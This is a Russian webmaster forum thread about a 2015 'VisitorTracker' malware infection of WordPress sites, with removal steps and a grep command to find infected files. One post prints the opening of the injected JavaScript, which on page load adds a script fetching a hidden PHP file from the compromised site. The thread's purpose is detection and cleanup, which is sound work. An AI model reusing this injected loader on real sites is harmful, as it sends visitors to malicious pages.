X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> "Дыра" в Wordpress
mmkulikov
mmkulikov
Topic Starter сообщение 29.9.2015, 13:56; Ответить: mmkulikov
Сообщение #1


Старожил
******

Группа: Active User
Сообщений: 2116
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 610 раз
Репутация:   70  


Эпидемия новой заразы на сайтах под управлением WordPress (включая самую последнюю)
Вот подробно о заразе
П.С.
Сегодня пол дня "коту под хвост" - сидел выковыривал эту погань на некоторых своих сайтах.
Нашел не на всех, но проверить пришлось все... :zloy:


--------------------


Поблагодарили: (3)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Vreg
Vreg
сообщение 29.9.2015, 13:58; Ответить: Vreg
Сообщение #2


3,14159265358979323846264
******

Группа: Super Moderator
Сообщений: 1298
Регистрация: 28.12.2011
Из: Курган
Поблагодарили: 1470 раз
Репутация:   199  


Каким образом проверяли?


--------------------
Написание и размножение статей - всегда рад помочь.
место сдается - писать в ЛС;
место сдается - писать в ЛС;
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
Topic Starter сообщение 29.9.2015, 14:08; Ответить: mmkulikov
Сообщение #3


Старожил
******

Группа: Active User
Сообщений: 2116
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 610 раз
Репутация:   70  


Цитата(Vreg @ 29.9.2015, 11:58) *
Каким образом проверяли?

Для начала получил "письмо счастья" от гугла, а потом все сайты руками
Находится легко, благо не шифруется
Вот пример начала зараженного файла js
Код
/*visitorTracker*/
var visitortrackerin = setInterval(function(){
    if(document.body != null && typeof document.body != "undefined"){
        clearInterval(visitortrackerin);
        if(typeof window["globalvisitor"] == "undefined"){
            window["globalvisitor"] = 1;
            var isIE = visitortrackerde();
            var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
              if(visitorTracker_isMob()){
              var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://здесь_потер_урл_своего_сайта/wp-includes/SimplePie/Content/Type/main_configs/tracks.php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
            }else{

Удаляем все найденные куски (они все только в начале файла) между /*visitorTracker*/код_трояна/*visitorTracker*/
Ну и папку с файлом (может распологаться по разному и называться по разному)
В данном примере это wp-includes/SimplePie/Content/Type/main_configs/tracks.php
Где-то так-с :pionertrava:


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Вентилятор
Вентилятор
сообщение 29.9.2015, 14:20; Ответить: Вентилятор
Сообщение #4


покупаю хорошие проекты
******

Группа: Active User
Сообщений: 1815
Регистрация: 8.8.2010
Поблагодарили: 605 раз
Репутация:   106  


Цитата(mmkulikov @ 29.9.2015, 12:56) *
Вот подробно о заразе


"Исследователи пишут, что сейчас малварь отсылает пользователей на vovagandon.tk (193.169.244.159)"


)))
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
x64
x64
сообщение 29.9.2015, 16:08; Ответить: x64
Сообщение #5


F.A.L.L.O.U.T.
*******

Группа: Super Moderator
Сообщений: 3544
Регистрация: 30.6.2011
Из: Железнодорожный (Балашиха)
Поблагодарили: 2881 раз
Репутация:   294  


Поискать файлы можно так: коннектимся по SSH и выполняем команду:
Код
find /путь/к/сайтам/ -name '*.php' | xargs -n1 grep -rlF 'VisitorTracker'



--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 29.9.2015, 17:11; Ответить: kagtus
Сообщение #6


Бывалый
****

Группа: User
Сообщений: 419
Регистрация: 11.10.2012
Из: Kostroma
Поблагодарили: 94 раза
Репутация:   21  


ТС, из какой фразы статьи вытекает, что
Цитата
на сайтах под управлением WordPress (включая самую последнюю)

???

Сообщение отредактировал kagtus - 29.9.2015, 17:12


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
siteSgun
siteSgun
сообщение 30.9.2015, 2:33; Ответить: siteSgun
Сообщение #7


Частый гость
**

Группа: User
Сообщений: 59
Регистрация: 9.9.2015
Поблагодарили: 13 раз
Репутация:   2  


Цитата(mmkulikov @ 29.9.2015, 13:56) *
Эпидемия новой заразы на сайтах под управлением WordPress (включая самую последнюю)

Как раз самые последние версии, чаще всего, и подвержены подобным "налетам". Шанс найти уязвимость и широкое распространение не оставляет шансов остаться без внимания у хакеров.

Есть же стабильные предыдущие релизы, зачем каждый раз торопиться с обновлениями?..
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
Topic Starter сообщение 30.9.2015, 11:55; Ответить: mmkulikov
Сообщение #8


Старожил
******

Группа: Active User
Сообщений: 2116
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 610 раз
Репутация:   70  


Цитата(x64 @ 29.9.2015, 14:08) *
find /путь/к/сайтам/ -name '*.php' | xargs -n1 grep -rlF 'VisitorTracker'

Сегодня обнаружил "клон" этой заразы с уже другой сигнатурой /*161557fbea2c302f309892cd115a35aa*/
Вот же га... :censored:

P.S.
Кстати - ошибочка ) Не *.php надо, а *.js
Эта дрянь "живет" в js скриптах

Сообщение отредактировал mmkulikov - 30.9.2015, 11:57


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
x64
x64
сообщение 30.9.2015, 12:03; Ответить: x64
Сообщение #9


F.A.L.L.O.U.T.
*******

Группа: Super Moderator
Сообщений: 3544
Регистрация: 30.6.2011
Из: Железнодорожный (Балашиха)
Поблагодарили: 2881 раз
Репутация:   294  


Цитата(mmkulikov @ 30.9.2015, 10:55) *
Кстати - ошибочка ) Не *.php надо, а *.js

Да хоть по всем файлам, но это ж долго, если что-то тяжёлое есть :)
Код
'*.php' → '*'


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
Topic Starter сообщение 30.9.2015, 12:18; Ответить: mmkulikov
Сообщение #10


Старожил
******

Группа: Active User
Сообщений: 2116
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 610 раз
Репутация:   70  


Цитата(x64 @ 30.9.2015, 10:03) *
Да хоть по всем файлам, но это ж долго

У меня "сидело" и в "безликих" tetqwqsad0ehSvo и т.п. (около 3000 файлов)
И 'VisitorTracker' уже не панацея :hmhm:
Благо "стиль" заражения пока остался. Ключевое сло здесь наверное "пока" :_censored:


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Алгоритм "Немезида" в ВК. МДК все?
3 MissContent 614 Сегодня, 0:03
автор: Fartovyj
Открытая тема (нет новых ответов) Ссылки с "морды" и внутр. DA-60 PA-46 Бурж тематика Форекс, опционы, криптовалюта и связанное
Принимаю тематики bitcoin, forex, money и сопутствующее
0 Shaltick 302 Вчера, 19:34
автор: Shaltick
Открытая тема (нет новых ответов) Верстка + натяжка на CMS WordPress, OpenCart
0 Chezarius 200 Вчера, 14:37
автор: Chezarius
Горячая тема (нет новых ответов) Услуги по CMS Wordpress, DLE, Joomla!. Правки, ремонт, настройка.
Редактирование и правки. Низкие цены.
156 contex1 70783 Вчера, 0:06
автор: AnnaProf
Открытая тема (нет новых ответов) Удаляю вирусы на CMS WordPress. Чищу качественно и быстро, даю гарантию.
10 maxix 1136 21.5.2018, 16:59
автор: maxix


 



RSS Текстовая версия Сейчас: 23.5.2018, 7:41
Дизайн